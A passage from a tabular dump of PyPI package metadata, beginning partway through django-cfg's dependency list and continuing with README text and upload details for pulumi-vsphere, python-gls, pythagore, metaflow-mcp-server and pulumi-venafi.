"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: System :: Systems Administration",
"Typing :: Typed"
] | [] | null | null | <3.14,>=3.12 | [] | [] | [] | [
"adrf<0.2.0,>=0.1.11",
"beautifulsoup4<5.0,>=4.13.0",
"cachetools<7.0,>=5.3.0",
"click<9.0,>=8.2.0",
"cloudflare<5.0,>=4.3.0",
"colorlog<7.0,>=6.9.0",
"coolname<3.0,>=2.2.0",
"cryptography>=44.0.0",
"dj-database-url<4.0,>=3.0.0",
"django-admin-rangefilter<1.0,>=0.13.0",
"django-axes[ipware]<9.0.0,>=8.0.0",
"django-constance<5.0,>=4.3.0",
"django-cors-headers<5.0,>=4.7.0",
"django-extensions<5.0,>=4.1.0",
"django-filter<26.0,>=25.0",
"django-import-export<5.0,>=4.3.0",
"django-json-widget<3.0,>=2.0.0",
"django-ratelimit<5.0.0,>=4.1.0",
"django-redis<7.0,>=6.0.0",
"django-tailwind[reload]<5.0.0,>=4.2.0",
"django-unfold>=0.73.1",
"djangorestframework-simplejwt<6.0,>=5.5.0",
"djangorestframework<4.0,>=3.16.0",
"drf-nested-routers<1.0,>=0.94.0",
"drf-spectacular-sidecar<2026.0,>=2025.8.0",
"drf-spectacular<1.0,>=0.28.0",
"extra-streamlit-components<1.0,>=0.1.81",
"geopy<3.0,>=2.4.0",
"hiredis<4.0,>=2.0.0",
"httpx<1.0,>=0.28.1",
"jinja2<4.0.0,>=3.1.6",
"loguru<1.0,>=0.7.0",
"lxml<7.0,>=6.0.0",
"mistune<4.0,>=3.1.4",
"mypy<2.0.0,>=1.18.2",
"ngrok>=1.5.1; python_version >= \"3.12\"",
"openai<3.0,>=1.107.0",
"pandas<3.0,>=2.0.0",
"pgvector<1.0,>=0.4.0",
"plotly<7.0,>=6.0.0",
"psutil>=7.0.0",
"psycopg[binary,pool]<4.0,>=3.2.0",
"pydantic-settings<3.0.0,>=2.11.0",
"pydantic<3.0,>=2.11.0",
"pydantic[email]<3.0,>=2.11.0",
"pygments<3.0,>=2.19.0",
"pyjwt<3.0,>=2.8.0",
"pyotp<3.0,>=2.9.0",
"pytelegrambotapi<5.0,>=4.28.0",
"python-json-logger<4.0,>=3.3.0",
"pywebpush<3.0,>=2.0.0",
"pyyaml<7.0,>=6.0",
"qrcode<9.0,>=8.2",
"questionary<3.0,>=2.1.0",
"redis<7.0,>=6.4.0",
"requests<3.0,>=2.32.0",
"rich<15.0,>=14.0.0",
"setuptools>=75.0.0; python_version >= \"3.13\"",
"streamlit-aggrid<2.0,>=1.2.1",
"streamlit-antd-components<1.0,>=0.3.0",
"streamlit-authenticator<1.0,>=0.4.1",
"streamlit-autorefresh<2.0,>=1.0.1",
"streamlit-cookies-controller<1.0,>=0.0.4",
"streamlit-extras<1.0,>=0.7.8",
"streamlit-folium<1.0,>=0.26.1",
"streamlit-keyup<1.0,>=0.3.0",
"streamlit-local-storage<1.0,>=0.0.25",
"streamlit-option-menu<1.0,>=0.4.0",
"streamlit-pydantic<1.0,>=0.6.0",
"streamlit-shadcn-ui<1.0,>=0.1.19",
"streamlit<2.0,>=1.54.0",
"tenacity<10.0.0,>=9.1.2",
"tiktoken<1.0,>=0.11.0",
"toml<0.11.0,>=0.10.2",
"tzlocal<6.0,>=5.3.1",
"whitenoise<7.0,>=6.8.0",
"pydantic-ai<2.0,>=1.34.0; extra == \"ai\"",
"cent<6.0,>=5.0.0; extra == \"centrifugo\"",
"websockets<15.0,>=13.0; extra == \"centrifugo\"",
"betterproto2-compiler<1.0,>=0.9.0; extra == \"dev\"",
"black>=23.0; extra == \"dev\"",
"build>=1.0; extra == \"dev\"",
"django<6.0,>=5.2; extra == \"dev\"",
"factory-boy>=3.0; extra == \"dev\"",
"fakeredis>=2.0; extra == \"dev\"",
"flake8>=5.0; extra == \"dev\"",
"isort>=5.0; extra == \"dev\"",
"mkdocs-material>=9.0; extra == \"dev\"",
"mkdocs>=1.5; extra == \"dev\"",
"mkdocstrings[python]>=0.24; extra == \"dev\"",
"mypy>=1.0; extra == \"dev\"",
"pre-commit>=3.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"pytest-django>=4.5; extra == \"dev\"",
"pytest-mock>=3.0; extra == \"dev\"",
"pytest>=7.0; extra == \"dev\"",
"questionary>=2.0; extra == \"dev\"",
"redis>=5.0; extra == \"dev\"",
"rich>=13.0; extra == \"dev\"",
"tomlkit>=0.11; extra == \"dev\"",
"twine>=4.0; extra == \"dev\"",
"django<6.0,>=5.2; extra == \"django52\"",
"mkdocs-material>=9.0; extra == \"docs\"",
"mkdocs>=1.5; extra == \"docs\"",
"mkdocstrings[python]>=0.24; extra == \"docs\"",
"pymdown-extensions>=10.0; extra == \"docs\"",
"aiobreaker<2.0,>=1.2.0; extra == \"full\"",
"betterproto2[all]<1.0,>=0.9.0; extra == \"full\"",
"black>=23.0; extra == \"full\"",
"build>=1.0; extra == \"full\"",
"cent<6.0,>=5.0.0; extra == \"full\"",
"django-rq>=3.0; extra == \"full\"",
"django<6.0,>=5.2; extra == \"full\"",
"factory-boy>=3.0; extra == \"full\"",
"flake8>=5.0; extra == \"full\"",
"grpcio-health-checking<2.0,>=1.50.0; extra == \"full\"",
"grpcio-reflection<2.0,>=1.50.0; extra == \"full\"",
"grpcio-tools<2.0,>=1.50.0; extra == \"full\"",
"grpcio<2.0,>=1.50.0; extra == \"full\"",
"grpclib<1.0,>=0.4.8; extra == \"full\"",
"hiredis>=2.0; extra == \"full\"",
"isort>=5.0; extra == \"full\"",
"mkdocs-material>=9.0; extra == \"full\"",
"mkdocs>=1.5; extra == \"full\"",
"mkdocstrings[python]>=0.24; extra == \"full\"",
"mypy>=1.0; extra == \"full\"",
"pre-commit>=3.0; extra == \"full\"",
"protobuf<7.0,>=5.0; extra == \"full\"",
"pydantic-ai<2.0,>=1.34.0; extra == \"full\"",
"pymdown-extensions>=10.0; extra == \"full\"",
"pytest-cov>=4.0; extra == \"full\"",
"pytest-django>=4.5; extra == \"full\"",
"pytest-mock>=3.0; extra == \"full\"",
"pytest-xdist>=3.0; extra == \"full\"",
"pytest>=7.0; extra == \"full\"",
"questionary>=2.0; extra == \"full\"",
"redis>=5.0; extra == \"full\"",
"rich>=13.0; extra == \"full\"",
"rq-scheduler>=0.13; extra == \"full\"",
"rq>=1.0; extra == \"full\"",
"stamina<26.0,>=25.2.0; extra == \"full\"",
"structlog<26.0,>=24.0.0; extra == \"full\"",
"tomlkit>=0.11; extra == \"full\"",
"twine>=4.0; extra == \"full\"",
"websockets<15.0,>=13.0; extra == \"full\"",
"aiobreaker<2.0,>=1.2.0; extra == \"grpc\"",
"betterproto2[all]<1.0,>=0.9.0; extra == \"grpc\"",
"grpcio-health-checking<2.0,>=1.50.0; extra == \"grpc\"",
"grpcio-reflection<2.0,>=1.50.0; extra == \"grpc\"",
"grpcio-tools<2.0,>=1.50.0; extra == \"grpc\"",
"grpcio<2.0,>=1.50.0; extra == \"grpc\"",
"grpclib<1.0,>=0.4.8; extra == \"grpc\"",
"protobuf<7.0,>=5.0; extra == \"grpc\"",
"stamina<26.0,>=25.2.0; extra == \"grpc\"",
"structlog<26.0,>=24.0.0; extra == \"grpc\"",
"django-rq>=3.0; extra == \"rq\"",
"hiredis>=2.0; extra == \"rq\"",
"redis>=5.0; extra == \"rq\"",
"rq-scheduler>=0.13; extra == \"rq\"",
"rq>=1.0; extra == \"rq\"",
"redis>=5.0; extra == \"tasks\"",
"django<6.0,>=5.2; extra == \"test\"",
"factory-boy>=3.0; extra == \"test\"",
"fakeredis>=2.0; extra == \"test\"",
"pytest-cov>=4.0; extra == \"test\"",
"pytest-django>=4.5; extra == \"test\"",
"pytest-mock>=3.0; extra == \"test\"",
"pytest-xdist>=3.0; extra == \"test\"",
"pytest>=7.0; extra == \"test\""
] | [] | [] | [] | [
"Homepage, https://djangocfg.com",
"Documentation, https://djangocfg.com",
"Repository, https://github.com/markolofsen/django-cfg",
"Issues, https://github.com/markolofsen/django-cfg/issues",
"Changelog, https://github.com/markolofsen/django-cfg/blob/main/CHANGELOG.md"
] | twine/6.2.0 CPython/3.12.8 | 2026-02-20T06:55:11.828624 | django_cfg-1.7.20.tar.gz | 26,314,752 | bf/0d/340a9d161f928d34115462ee40c12deff57a4f70ef7fca802b66b4627546/django_cfg-1.7.20.tar.gz | source | sdist | null | false | 79b9f35551a3ac8d83a07866cb2119e3 | f827b9cca9959938c7823baaabe71b2d73b7da1bfda965863560f5f506a1d8bf | bf0d340a9d161f928d34115462ee40c12deff57a4f70ef7fca802b66b4627546 | null | [
"LICENSE"
] | 269 |
2.4 | pulumi-vsphere | 4.17.0a1771570077 | A Pulumi package for creating vsphere resources | [](https://github.com/pulumi/pulumi-vsphere/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/vsphere)
[](https://pypi.org/project/pulumi-vsphere)
[](https://badge.fury.io/nu/pulumi.vsphere)
[](https://pkg.go.dev/github.com/pulumi/pulumi-vsphere/sdk/v3/go)
[](https://github.com/pulumi/pulumi-vsphere/blob/master/LICENSE)
# VSphere provider
The VSphere resource provider for Pulumi lets you use VSphere resources in your infrastructure
programs. To use this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/vsphere
or `yarn`:
$ yarn add @pulumi/vsphere
### Python
To use from Python, install using `pip`:
$ pip install pulumi-vsphere
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-vsphere/sdk/v3/
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Vsphere
## Configuration
The following configuration points are available:
- `vsphere:user` - (Required) This is the username for vSphere API operations. Can also be specified with the `VSPHERE_USER`
environment variable.
- `vsphere:password` - (Required) This is the password for vSphere API operations. Can also be specified with the
`VSPHERE_PASSWORD` environment variable.
- `vsphere:vsphereServer` - (Required) This is the vCenter server name for vSphere API operations. Can also be specified
with the `VSPHERE_SERVER` environment variable.
- `vsphere:allowUnverifiedSsl` - (Optional) Boolean that can be set to true to disable SSL certificate verification.
This should be used with care as it could allow an attacker to intercept your auth token. If omitted, default value is
`false`. Can also be specified with the `VSPHERE_ALLOW_UNVERIFIED_SSL` environment variable.
- `vsphere:vimKeepAlive` - (Optional) Keep alive interval in minutes for the VIM session. Standard session timeout in
vSphere is 30 minutes. This defaults to `10` minutes to ensure that operations that take a longer than 30 minutes
without API interaction do not result in a session timeout. Can also be specified with the `VSPHERE_VIM_KEEP_ALIVE`
environment variable.
- `vsphere:persistSession` - (Optional) Persist the SOAP and REST client sessions to disk. Default: false. Can also be
specified by the `VSPHERE_PERSIST_SESSION` environment variable.
- `vsphere:vimSessionPath` - (Optional) The direcotry to save the VIM SOAP API session to. Default: `${HOME}/.govmomi/sessions`.
Can also be specified by the `VSPHERE_VIM_SESSION_PATH` environment variable.
- `vsphere:restSessionPath` - (Optional) The directory to save the REST API session (used for tags) to. Default: `${HOME}/.govmomi/rest_sessions`.
Can also be specified by the `VSPHERE_REST_SESSION_PATH` environment variable.
- `vsphere:clientDebug` - (Optional) When `true`, the provider logs SOAP calls made to the vSphere API to disk. The log
files are logged to `${HOME}/.govmomi`. Can also be specified with the `VSPHERE_CLIENT_DEBUG` environment variable.
- `vsphere:clientDebugPath` - (Optional) Override the default log path. Can also be specified with the
`VSPHERE_CLIENT_DEBUG_PATH` environment variable.
- `vsphere:clientDebugPathRun` - (Optional) A specific subdirectory in `client_debug_path` to use for debugging calls for
this particular provider configuration. All data in this directory is removed at the start of the provider run. Can also
be specified with the `VSPHERE_CLIENT_DEBUG_PATH_RUN` environment variable.
## Reference
For further information, please visit [the vSphere provider docs](https://www.pulumi.com/docs/intro/cloud-providers/vsphere) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/vsphere).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, vsphere | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-vsphere"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:54:29.250515 | pulumi_vsphere-4.17.0a1771570077.tar.gz | 319,950 | 32/d8/4ecab1651ccc9f37e79e978b88ce911a8e72ecfeabe46d3de144c0a3564f/pulumi_vsphere-4.17.0a1771570077.tar.gz | source | sdist | null | false | ff10ce189d5b3bc5c8ab51142be19708 | c9acc7bbd6dc3b77863e124550dce2951a9be9da78c1c74906803b4dcf540953 | 32d84ecab1651ccc9f37e79e978b88ce911a8e72ecfeabe46d3de144c0a3564f | null | [] | 213 |
2.4 | python-gls | 0.2.0 | GLS estimator with learned correlation and variance structures (Python equivalent of R's nlme::gls) | # python-gls
**GLS with learned correlation and variance structures for Python.**
The missing Python equivalent of R's `nlme::gls()`. Unlike `statsmodels.GLS` (which requires you to supply a pre-computed covariance matrix), `python-gls` *estimates* the correlation and variance structure from your data via maximum likelihood (ML) or restricted maximum likelihood (REML) — exactly like R's `nlme::gls()`.
## Why this library?
If you work with **panel data**, **repeated measures**, **longitudinal studies**, or **clustered observations**, your errors are probably correlated and possibly heteroscedastic. Ignoring this gives you wrong standard errors and misleading p-values.
R has had `nlme::gls()` for 25+ years. Python hasn't had an equivalent. Until now.
| Feature | `statsmodels.GLS` | `python-gls` | R `nlme::gls` |
|---|---|---|---|
| Estimate correlation from data | No (manual Omega) | Yes | Yes |
| AR(1), compound symmetry, etc. | No | Yes (11 structures) | Yes |
| Heteroscedastic variance models | No | Yes (6 functions) | Yes |
| ML / REML estimation | No | Yes | Yes |
| R-style formulas | No | Yes | Yes |
## Installation
```bash
pip install python-gls
```
Or from source:
```bash
git clone https://github.com/brunoabrahao/python-gls.git
cd python-gls
pip install -e ".[dev]"
```
## Quick Start
```python
from python_gls import GLS
from python_gls.correlation import CorAR1
from python_gls.variance import VarIdent
result = GLS.from_formula(
"response ~ treatment + time",
data=df,
correlation=CorAR1(), # Learn AR(1) correlation
variance=VarIdent("group"), # Learn group-specific variances
groups="subject", # Define independent clusters
).fit()
print(result.summary())
print(f"Estimated AR(1) phi: {result.correlation_params[0]:.3f}")
```
Output:
```
==============================================================================
Generalized Least Squares Results
==============================================================================
Method: REML Log-Likelihood: -615.0544
No. Observations:500 AIC: 1240.1088
Df Model: 2 BIC: 1261.1818
Df Residuals: 497 Sigma^2: 0.984576
Converged: Yes Iterations: 6
------------------------------------------------------------------------------
coef std err t P>|t| [0.025 0.975]
------------------------------------------------------------------------------
Intercept 1.0368 0.1069 9.7013 0.0000 0.8268 1.2468
treatment 0.6465 0.1428 4.5272 0.0000 0.3659 0.9271
x 1.9734 0.0323 61.0960 0.0000 1.9099 2.0368
==============================================================================
Correlation Structure: CorAR1
Parameters: [0.61312872]
```
## Correlation Structures
All correlation structures are in `python_gls.correlation`.
### Temporal / Serial Correlation
| Class | R Equivalent | Parameters | Description |
|---|---|---|---|
| `CorAR1(phi=None)` | `corAR1()` | 1 | First-order autoregressive. R[i,j] = phi^|i-j| |
| `CorARMA(p, q)` | `corARMA(p, q)` | p + q | ARMA(p,q) autocorrelation |
| `CorCAR1(phi=None)` | `corCAR1()` | 1 | Continuous-time AR(1) for irregular spacing |
| `CorCompSymm(rho=None)` | `corCompSymm()` | 1 | Exchangeable / compound symmetry. All pairs equal rho |
| `CorSymm(dim=None)` | `corSymm()` | d(d-1)/2 | General unstructured. Free correlation for every pair |
### Spatial Correlation
| Class | R Equivalent | Parameters | Description |
|---|---|---|---|
| `CorExp(range_param, nugget=False)` | `corExp()` | 1-2 | Exponential: exp(-d/range) |
| `CorGaus(range_param, nugget=False)` | `corGaus()` | 1-2 | Gaussian: exp(-(d/range)^2) |
| `CorLin(range_param, nugget=False)` | `corLin()` | 1-2 | Linear: max(1 - d/range, 0) |
| `CorRatio(range_param, nugget=False)` | `corRatio()` | 1-2 | Rational quadratic: 1/(1 + (d/range)^2) |
| `CorSpher(range_param, nugget=False)` | `corSpher()` | 1-2 | Spherical: cubic polynomial, zero beyond range |
All spatial structures accept an optional `nugget=True` parameter for a discontinuity at distance zero.
### Usage
```python
from python_gls.correlation import CorAR1, CorSymm, CorExp
# Serial: AR(1) with optional initial value
cor = CorAR1(phi=0.5)
# Unstructured: all pairs free
cor = CorSymm() # dimension inferred from data
# Spatial: set coordinates per group
cor = CorExp(range_param=10.0, nugget=True)
cor.set_coordinates(group_id=0, coords=np.array([[0,0], [1,0], [0,1]]))
```
## Variance Functions
All variance functions are in `python_gls.variance`.
| Class | R Equivalent | Parameters | Description |
|---|---|---|---|
| `VarIdent(group_var)` | `varIdent(form=~1\|group)` | G-1 | Different variance per group level |
| `VarPower(covariate)` | `varPower(form=~cov)` | 1 | sd = |v|^delta |
| `VarExp(covariate)` | `varExp(form=~cov)` | 1 | sd = exp(delta * v) |
| `VarConstPower(covariate)` | `varConstPower(form=~cov)` | 2 | sd = (c + |v|^delta) |
| `VarFixed(weights_var)` | `varFixed(~cov)` | 0 | Pre-specified weights (not estimated) |
| `VarComb(*varfuncs)` | `varComb(...)` | sum | Product of multiple variance functions |
### Usage
```python
from python_gls.variance import VarIdent, VarPower, VarComb
# Different variance for treatment vs. control
var = VarIdent("treatment_group")
# Variance increases with fitted values
var = VarPower("fitted_values")
# Combine: group-specific + covariate-dependent
var = VarComb(VarIdent("group"), VarPower("x"))
```
## API Reference
### `GLS` Class
#### Construction
```python
# From formula (recommended)
model = GLS.from_formula(
formula, # R-style formula: "y ~ x1 + x2"
data, # pandas DataFrame
correlation=None, # CorStruct instance
variance=None, # VarFunc instance
groups=None, # str: column name for groups
method="REML", # "ML" or "REML"
)
# From arrays
model = GLS(
endog=y, # response vector
exog=X, # design matrix (include intercept column)
correlation=None,
variance=None,
groups=None, # array of group labels
method="REML",
)
```
#### Fitting
```python
result = model.fit(
maxiter=200, # max optimization iterations
tol=1e-8, # convergence tolerance
verbose=False, # print optimization progress
n_jobs=1, # parallel threads (-1 for all cores)
)
```
### `GLSResults` Class
| Property / Method | Type | Description |
|---|---|---|
| `params` | Series | Estimated coefficients |
| `bse` | Series | Standard errors |
| `tvalues` | Series | t-statistics |
| `pvalues` | Series | Two-sided p-values |
| `conf_int(alpha=0.05)` | DataFrame | Confidence intervals |
| `sigma2` | float | Estimated residual variance |
| `loglik` | float | Log-likelihood at convergence |
| `aic` | float | Akaike Information Criterion |
| `bic` | float | Bayesian Information Criterion |
| `resid` | array | Residuals (y - X*beta) |
| `fittedvalues` | array | Fitted values (X*beta) |
| `correlation_params` | array | Estimated correlation parameters |
| `variance_params` | array | Estimated variance parameters |
| `cov_params_func()` | DataFrame | Covariance matrix of beta |
| `summary()` | str | Formatted results table |
| `converged` | bool | Optimization convergence status |
| `n_iter` | int | Number of iterations |
| `method` | str | "ML" or "REML" |
## How It Works
### The Statistical Model
GLS models the response as:
**y = X*beta + epsilon**, where **Var(epsilon) = sigma^2 * Omega**
The covariance matrix Omega is block-diagonal by group:
**Omega_g = A_g^{1/2} R_g A_g^{1/2}**
where:
- **R_g** is the correlation matrix (from the correlation structure)
- **A_g** is a diagonal matrix of variance weights (from the variance function)
### Estimation
1. **OLS initial fit** to get starting residuals
2. **Initialize** correlation and variance parameters from residuals
3. **Optimize** profile log-likelihood over correlation/variance parameters using L-BFGS-B. At each step, beta and sigma^2 are profiled out analytically.
4. **Compute** final GLS estimates at the converged parameters:
- beta = (X' Omega^{-1} X)^{-1} X' Omega^{-1} y
- Cov(beta) = sigma^2 (X' Omega^{-1} X)^{-1}
### Key Design Decisions
**Spherical parametrization** for `CorSymm`: The unstructured correlation matrix is parametrized via angles that map to a Cholesky factor, guaranteeing positive-definiteness without constrained optimization. Based on [Pinheiro & Bates (1996)](https://doi.org/10.1007/BF00140873).
**Analytic inverses**: AR(1) and compound symmetry correlation matrices have O(m) analytic inverses and O(1) log-determinants, avoiding dense O(m^3) solves.
**Batched computation**: Balanced panels (equal group sizes) use batched NumPy operations — a single matrix multiply across all groups — instead of per-group loops.
**Block-diagonal inversion**: Omega is inverted per-group (O(n*m^3)) rather than as a full matrix (O(N^3)), where n = number of groups and m = group size.
**Thread-level parallelism**: Pass `n_jobs=-1` to `.fit()` to distribute group-level computations across CPU cores via a thread pool. Useful for large unbalanced panels.
**REML**: Restricted maximum likelihood integrates out the fixed effects from the likelihood, giving unbiased variance estimates. This is the default, matching R's `nlme::gls()`.
## Formula Syntax
Powered by [formulaic](https://github.com/matthewwardrop/formulaic), supporting:
```python
# Simple linear
"y ~ x1 + x2"
# Categorical variables
"y ~ C(treatment)"
# Interactions
"y ~ x1 * x2" # x1 + x2 + x1:x2
"y ~ x1 : x2" # just the interaction
# Transformations
"y ~ np.log(x1) + x2"
# Remove intercept
"y ~ x1 + x2 - 1"
```
## ML vs. REML
| | ML | REML |
|---|---|---|
| Variance estimate | Biased (divides by N) | Unbiased (divides by N-k) |
| Default in R's gls | No | Yes |
| Default here | No | Yes |
| Use for model comparison | AIC/BIC of nested & non-nested models | Only models with same fixed effects |
| `method=` | `"ML"` | `"REML"` |
## Translating from R
### R code → Python equivalent
```r
# R
library(nlme)
m <- gls(y ~ x1 + x2,
data = df,
correlation = corAR1(form = ~1|subject),
weights = varIdent(form = ~1|group),
method = "REML")
summary(m)
intervals(m)
```
```python
# Python
from python_gls import GLS
from python_gls.correlation import CorAR1
from python_gls.variance import VarIdent
r = GLS.from_formula(
"y ~ x1 + x2",
data=df,
correlation=CorAR1(),
variance=VarIdent("group"),
groups="subject",
method="REML",
).fit()
print(r.summary())
print(r.conf_int())
```
### Parameter name mapping
| R | Python | Notes |
|---|---|---|
| `corAR1(form=~1\|subject)` | `CorAR1(), groups="subject"` | Groups specified at model level |
| `corCompSymm(form=~1\|id)` | `CorCompSymm(), groups="id"` | |
| `corSymm(form=~1\|id)` | `CorSymm(), groups="id"` | |
| `corExp(form=~x+y\|id)` | `CorExp(); cor.set_coordinates(...)` | Coordinates set per group |
| `varIdent(form=~1\|group)` | `VarIdent("group")` | Group variable as string |
| `varPower(form=~fitted)` | `VarPower("fitted")` | Covariate name as string |
| `method="REML"` | `method="REML"` | Same |
## Dependencies
- **numpy** >= 1.24
- **scipy** >= 1.10
- **pandas** >= 2.0
- **formulaic** >= 1.0
## Testing
```bash
pip install -e ".[dev]"
pytest
```
## License
MIT
| text/markdown | Bruno Abrahao | null | null | null | null | null | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Mathematics"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=1.24",
"scipy>=1.10",
"pandas>=2.0",
"formulaic>=1.0",
"pytest>=7.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"statsmodels>=0.14; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:54:20.478469 | python_gls-0.2.0.tar.gz | 46,888 | 05/16/db0ccfaade88a003e36f09556874a2e8f974fe29e83197b941f5f4774a47/python_gls-0.2.0.tar.gz | source | sdist | null | false | bcd4b9f47f99c5888aea5186e60453e7 | cd5acb27a72d78c43cc99bd0922adcb91bad5e359e1db5b7885b5bdfcd2ad200 | 0516db0ccfaade88a003e36f09556874a2e8f974fe29e83197b941f5f4774a47 | MIT | [
"LICENSE"
] | 229 |
2.4 | pythagore | 1.3.1 | allows you to solve the Pythagorean theorem in Python | # pythagore
allows you to solve the Pythagorean theorem in Python
## ✨ Features
- Calculate the hypotenuse from the two adjacent sides (`a` and `b`)
- Calculate a missing side if the hypotenuse and another side are known
- Check if a triangle is a right triangle by applying the Pythagorean theorem
## 🔧 Installation
You can install this module with `pip`:
```bash
pip install pythagore
```
## 🚀 Utilisation
Here is an example of using the module :
```python
from pythagore import Pythagore
pythagore = Pythagore()
a = 3
b = 4
hypotenuse = pythagore.hypotenus(a,b) # hypotenus
if pythagore.is_rectangle(hypotenuse, a, b) == True:
print("the triangle is indeed right-angled according to the Pythagorean theorem")
else:
print("the triangle is not a right triangle")
find_missing_side = pythagore.adjacent_side(hypotenuse, a) # 4
if find_missing_side == b:
print(f"the missing side is b its value and : {find_missing_side}")
print()
print(f"hypotenus : {hypotenuse}\ncoter_a : {a}\ncote_b : {b}")
```
## ❗ Prerequisites
- Python >= 3.13.0
📄 Licence
This project is distributed under the MIT License.
See the LICENSE file for more information.
[LICENSE](./LICENSE)
| text/markdown | Tina | tina.xytrfgthuji1348@gmail.com | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Topic :: Scientific/Engineering :: Mathematics"
] | [] | https://github.com/Tina-1300/pythagore | null | >=3.13.0 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.0 | 2026-02-20T06:54:09.122628 | pythagore-1.3.1.tar.gz | 3,524 | 70/c6/9320094b0af5331d7d5e851018cb2ff72d9324f0f4a5dc7ecbca0d88c2ac/pythagore-1.3.1.tar.gz | source | sdist | null | false | c6d806b5d4eafd17b86d2ef0ca49591a | bfe10f67568df6283dcbc9311b84a416ea19a2344aa1afdc70e418c7c11c7c00 | 70c69320094b0af5331d7d5e851018cb2ff72d9324f0f4a5dc7ecbca0d88c2ac | null | [
"LICENSE"
] | 225 |
2.4 | metaflow-mcp-server | 0.1.2 | MCP server for Metaflow -- expose flow runs, logs, and artifacts as tools for AI coding agents | # Metaflow MCP Server
[](https://github.com/npow/metaflow-mcp-server/actions/workflows/ci.yml)
[](https://pypi.org/project/metaflow-mcp-server/)
[](https://pypi.org/project/metaflow-mcp-server/)
[](LICENSE)
[](https://modelcontextprotocol.io/)
Give your coding agent superpowers over your Metaflow workflows. Instead of writing throwaway scripts to check run status or dig through logs, just ask -- your agent will figure out the rest.
Works with any Metaflow backend: local, S3, Azure, GCS, or Netflix internal.
<p align="center">
<img src="demo/demo.gif" alt="demo" width="800">
</p>
## Tools
| Tool | Description |
|------|-------------|
| `get_config` | What backend am I connected to? |
| `search_runs` | Find recent runs of any flow |
| `get_run` | Step-by-step breakdown of a run |
| `get_task_logs` | Pull stdout/stderr from a task |
| `list_artifacts` | What did this step produce? |
| `get_artifact` | Grab an artifact's value |
| `get_latest_failure` | What broke and why? |
## Quickstart
```bash
pip install metaflow-mcp-server
claude mcp add --scope user metaflow -- metaflow-mcp-server
```
That's it. Restart Claude Code and start asking questions about your flows.
If Metaflow lives in a specific venv, point to it:
```bash
claude mcp add --scope user metaflow -- /path/to/venv/bin/metaflow-mcp-server
```
For other MCP clients, the server speaks stdio: `metaflow-mcp-server`
## How it works
Wraps the Metaflow client API. Whatever backend your Metaflow is pointed at, the server uses too -- no separate config needed. Sets `namespace(None)` at startup so production runs (Argo, Step Functions, Maestro) are visible alongside your dev runs.
Starts once per session, communicates over stdin/stdout. No daemon, no port.
## License
Apache-2.0
| text/markdown | null | null | null | null | Apache-2.0 | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"License :: OSI Approved :: Apache Software License"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"metaflow>=2.12.0",
"mcp>=1.0.0",
"pytest>=7.0.0; extra == \"test\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:53:25.934428 | metaflow_mcp_server-0.1.2.tar.gz | 9,711 | a0/df/7a72aa7b6fd505871a0e88f8677ea94c30b45d441a4ca37ad2dc6105fec1/metaflow_mcp_server-0.1.2.tar.gz | source | sdist | null | false | d4a90ee92171a528e76b0b4f1136d82c | a7023a70c5b2a0a7709d26a5020c6e025270dc30d55346890959a126460956d0 | a0df7a72aa7b6fd505871a0e88f8677ea94c30b45d441a4ca37ad2dc6105fec1 | null | [
"LICENSE"
] | 238 |
2.4 | pulumi-venafi | 1.13.0a1771570021 | A Pulumi package for creating and managing venafi cloud resources. | [](https://github.com/pulumi/pulumi-venafi/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/venafi)
[](https://pypi.org/project/pulumi-venafi)
[](https://badge.fury.io/nu/pulumi.venafi)
[](https://pkg.go.dev/github.com/pulumi/pulumi-venafi/sdk/go)
[](https://github.com/pulumi/pulumi-venafi/blob/master/LICENSE)
# Venafi Resource Provider
The Venafi Resource Provider lets you manage Venafi resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/venafi
or `yarn`:
$ yarn add @pulumi/venafi
### Python
To use from Python, install using `pip`:
$ pip install pulumi_venafi
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-venafi/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Venafi
## Configuration
The following configuration points are available:
- `venafi:zone` - (Optional) Zone ID for Venafi Cloud or policy folder for Venafi Platform.
It can also be sourced from the `VENAFI_ZONE` environment variable.
